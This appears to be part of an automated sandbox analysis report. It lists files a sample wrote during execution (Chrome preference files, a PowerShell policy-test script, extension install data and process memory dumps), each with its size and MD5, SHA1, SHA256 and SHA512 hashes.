7632073decfc22dd16b68d510ba97f79fed1ba1ad7dd6446ea717a1b3f1a313d7db81d47884b9328fe9014fc7855e7bd77c8fec98dfa8769ed8db8e30a57fb7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
270c23c2bfa640e0ebd54b42606523a8

SHA1
201a1c66bcfb08c4b5f8b460a1279574d4892601

SHA256
e28549967deae86c16b64bc6499c6916619df506b2a9e04e2c8c4dccff409ea2

SHA512
8068344b4923c1c1f09390e9a99d285bf129e355be16c7edeb472b6bf39d3abc8d394d30d47fdbe4a1a97dba5a5165418ad7134358b843a9dd3f11b2748eb786

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
db6f502ed78caddad21cd00c0f90698b

SHA1
cc2aa811db588af6d823c16efb8cfad20e193aa0

SHA256
73818a9295d69352611c4e1732af0808b21f95fd07c99e8441b89cd634ca6e09

SHA512
c8e8ea1cd191e51de442bf6fe1fe6f1f81e314f5089bf80eca18991c7da77fbac6075a8fa2fe3aacc31f50ad27ad3501e8a5af418c54bebc1792e357a642cbd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
55513420dad8aea1326c55dbf4ce3dfb

SHA1
1cd3d6a586c4b8b35cdddc06848fb1f1ab80c7fd

SHA256
7b0f75e24e6b3220c3c49f12eb57632ac9771f58f2fc35619c52ab7129afac5d

SHA512
96c1b6d2461df3612492825cf6d1540d64e28791257cd29d6cf39d65b9acd0f04b1729c7f3714ae0d7fad953af7e5335be1117c7701325018ef374d046e7aaa1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2048de513b8c03c5ec2e6af29770fa48

SHA1
a6f01e8a512d7fd80e49f8d9f01eb7656dd9bb43

SHA256
8b2ada2deee4d0b661c131308fc4f68c31ede605e2504f5d8cab6df07578a8b9

SHA512
8b9295f6f914dbfe7da5cac94ef5449f3993871fa7bb3357e9d33653ddb020b7b98257d93622122f186416d8226cf02d848e2a538f151f82e1ca2c5dc5b5e2b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3a44d97241527feeeee85889d82e4e38

SHA1
5f7ffda778079a647b78af827111128107e530cb

SHA256
57d513994ce2949b30a98a632b7b68ebddbf8ca5f10413874584c625c29a14b5

SHA512
4074e73763b554a360f28b0009d3ca61f70df0b8c07052cb783235e9939cdc2ea254a3602509f69fbc374d125e1a2ed9692c6921045f4e272d2b596b42367845

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
a509a206718a463c7448a3f0178ca83e

SHA1
10a19eb0c3ee0527977407aabbf1adb092cfda77

SHA256
a47087ca184d4755a70f23328cd056ee2e466913e0ed9624030c1ca795e28e50

SHA512
0530e57d04a2f13ab7f6fb9a3740e88b35ebf17e005a9e52b20f60380686becce62b837670fd70efbc2aa0779918ff8fd4af965929a908ec90e31c10a0bbd273

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
efa40f66cf9e1553dbe5362c38c187b5

SHA1
d58948244706f0397cefe4fef6a8ff9ac4fb849f

SHA256
6d1d09eb912d15c26f1b5eb7d87dd4e5f75da77a5bbd3e0b573d0f5a466addc6

SHA512
1f6d85219864fbd5ffaa3cd76c36f5ee62a1f63aa9d84288e445af4c3ecb69f4bbdda68530a823a21d6507d69145a84e3117bd4c552ea89a399219b4e3674640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
85aed5ee790ef32ca97a9dd448f8ce4c

SHA1
27e85696687f5f96b03015e8dde22fe0e0efc11c

SHA256
a7a35e3658e1fe1668e30f602615135bfacef501839717071017bb20ffb839ee

SHA512
f9980b6c05aa67fc0d831d3dfa72583b3ebde9188a00d3ab40c22810a2bec78599264fec9d73e82459080d93f4bc8dc0b64bc76ca596862b074fd4abecaa497b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
24fb29d1c7c95e0e0a2f61477ed823bd

SHA1
c38f25ac849ad2d58129c0a27832709235bfe1af

SHA256
a3243e5908763fd224e76b30f9311c2cf83ad5d4ab03ea9354751fcb5da4963b

SHA512
38a9bfecaf070454a002eb9c903f4f4e7e1aa1d55ee8dcbec73bd22b645c0406e9835c91e29572e00eb37b2d623e2abd5bd60dc8be208a4e3e3eb5031c975d6a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\fb2bdb1d-12ad-4758-80d1-359e1f4c96a9.tmp

Filesize
245KB

MD5
196cd1eb2c540c38a853436055c6c03c

SHA1
f1d63db19d1b5111dd82d3b7416f63a99a8bf7db

SHA256
c398508a87ac3ef62f3dd9997e8c23d5d9f8c8c56d9bc91ace2dae0933dfc5e7

SHA512
6c6623bb4e704653704784c4ee319cde50c0e52512f7a614fe298e8b75c85d6f3714d095ee5c89df0b6034ba78ebc1e3fdc7a439ed0ae4132fbcfb9caabefbf8

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\0241de8f-1c38-426d-89e0-2febf461afec.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_254vm3vi.4ue.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3712_1350467891\7db63466-bb6f-4f11-9849-4da4996cdd32.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3712_1350467891\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
memory/2528-14-0x00000167F3880000-0x00000167F3894000-memory.dmp

Filesize
80KB

Download
memory/2528-0-0x00007FFD08EE3000-0x00007FFD08EE5000-memory.dmp

Filesize
8KB

Download
memory/2528-11-0x00007FFD08EE0000-0x00007FFD099A2000-memory.dmp

Filesize
10.8MB

Download
memory/2528-12-0x00007FFD08EE0000-0x00007FFD099A2000-memory.dmp

Filesize
10.8MB

Download
memory/2528-13-0x00000167F37E0000-0x00000167F37E8000-memory.dmp

Filesize
32KB

Download
memory/2528-15-0x00000167F3BC0000-0x00000167F3BDC000-memory.dmp

Filesize
112KB

Download
memory/2528-10-0x00007FFD08EE0000-0x00007FFD099A2000-memory.dmp

Filesize
10.8MB

Download
memory/2528-9-0x00000167F37F0000-0x00000167F3812000-memory.dmp

Filesize
136KB

Download
memory/2528-16-0x00007FFD08EE0000-0x00007FFD099A2000-memory.dmp

Filesize
10.8MB

Download